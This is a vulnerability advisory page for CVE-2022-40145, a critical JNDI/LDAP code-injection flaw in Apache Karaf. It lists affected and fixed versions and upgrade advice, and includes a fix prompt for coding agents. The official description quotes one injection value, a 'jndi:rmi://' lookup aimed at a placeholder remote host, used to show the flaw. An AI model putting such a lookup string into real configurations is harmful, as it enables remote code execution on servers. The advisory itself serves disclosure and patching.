# CVE-2022-40145: Apache Karaf: JDBC JAAS LDAP injection

> Attackers can achieve remote code execution in Apache Karaf by controlling the target LDAP server when a JNDI LDAP data source URI is configured.

- **Severity:** Critical 9.8 (`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`)
- **Exploited in the wild:** Not known
- **Login needed:** Not needed
- **Attackable:** Over the internet
- **Victim action needed:** Not needed
- **Fix available:** Yes
- **Published:** 21 Dec 2022
- **Updated:** 15 Apr 2025
- **Also known as:** GHSA-c2p4-8mvv-rwmv

## What is CVE-2022-40145?

CVE-2022-40145 is a critical code injection vulnerability in Apache Karaf, published on 21 Dec 2022. An attacker can exploit it over the internet without logging in, with no action from the victim.

### Official description

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.

The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
use InitialContext.lookup(jndiName) without filtering.
An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.

This is vulnerable to a remote code execution (RCE) attack when a
configuration uses a JNDI LDAP data source URI when an attacker has
control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.

We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

Weakness: CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component), CWE-20 (Improper Input Validation)

## Which versions are affected by CVE-2022-40145?

4 open source packages ship an affected version, including org.apache.karaf:apache-karaf. It affects 1 product.


| Package | Ecosystem | Affected | Fixed in |
| --- | --- | --- | --- |
| `org.apache.karaf:apache-karaf` | Maven | All versions | 4.3.8 |
| `org.apache.karaf:apache-karaf` | Maven | All versions | 4.3.8 |
| `org.apache.karaf:apache-karaf` | Maven | From 4.4.0 | 4.4.2 |
| `org.apache.karaf:apache-karaf` | Maven | From 4.4.0 | 4.4.2 |

Products: Apache Karaf.

## How do I fix CVE-2022-40145?

Upgrade org.apache.karaf:apache-karaf to a fixed version for your release line: 4.3.8 or 4.4.2.

## Is CVE-2022-40145 being exploited?

There is no known exploitation of CVE-2022-40145 in the wild and no public exploit code.

## Other vulnerabilities in Apache Karaf

- [CVE-2026-91012](https://insights.sbomify.com/CVE-2026-91012/): Apache Karaf: Path Traversal in Config Service Allows Manager-to-Admin Privilege Escalation (critical 9.8)
- [CVE-2026-91048](https://insights.sbomify.com/CVE-2026-91048/): Missing authorization in Apache Karaf (critical 9.8)
- [CVE-2018-11788](https://insights.sbomify.com/CVE-2018-11788/): XML External Entity Reference in Apache Karaf (critical 9.8)
- [CVE-2026-92142](https://insights.sbomify.com/CVE-2026-92142/): Apache Karaf: Authorization bypass in JMX MBean lifecycle operations (high 8.8)
- [CVE-2026-91006](https://insights.sbomify.com/CVE-2026-91006/): Apache Karaf: OS Command Injection in Child-Instance Launch (instance:* / InstancesMBean) (high 8.8)

## Fix prompt for AI coding agents

```text
Check this codebase for CVE-2022-40145 and fix it if it is affected.

What it is: CVE-2022-40145 is a critical code injection vulnerability in Apache Karaf, published on 21 Dec 2022. An attacker can exploit it over the internet without logging in, with no action from the victim.
Exploitation: There is no known exploitation of CVE-2022-40145 in the wild and no public exploit code.

Affected packages and fixed versions:
- org.apache.karaf:apache-karaf (Maven): affected all versions; fixed in 4.3.8
- org.apache.karaf:apache-karaf (Maven): affected all versions; fixed in 4.3.8
- org.apache.karaf:apache-karaf (Maven): affected from 4.4.0; fixed in 4.4.2
- org.apache.karaf:apache-karaf (Maven): affected from 4.4.0; fixed in 4.4.2

Task:
1. Search the dependency manifests and lockfiles (for example package.json, package-lock.json, requirements.txt, poetry.lock, uv.lock, pom.xml, build.gradle, go.mod, Cargo.lock, Gemfile.lock) and any Dockerfiles for the affected packages, including transitive dependencies.
2. If an affected version is in use, upgrade it to the fixed version for its release line with the project's package manager, so the lockfile is regenerated. Prefer the smallest upgrade that fixes it.
3. If there is no fix, or the upgrade would break the build, do not guess: explain the risk and the safest workaround instead.
4. Run the tests and summarise what changed and why.
5. If nothing in the project is affected, say so and change nothing.

Reference: https://insights.sbomify.com/CVE-2022-40145/ (Markdown: https://insights.sbomify.com/CVE-2022-40145/index.md)
```

## Sources

- CVE record: https://www.cve.org/CVERecord?id=CVE-2022-40145
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-40145
- OSV: https://osv.dev/vulnerability/CVE-2022-40145

---
From sbomify Insights: https://insights.sbomify.com/CVE-2022-40145/
Summaries are generated and may contain mistakes; the official description above is the record.
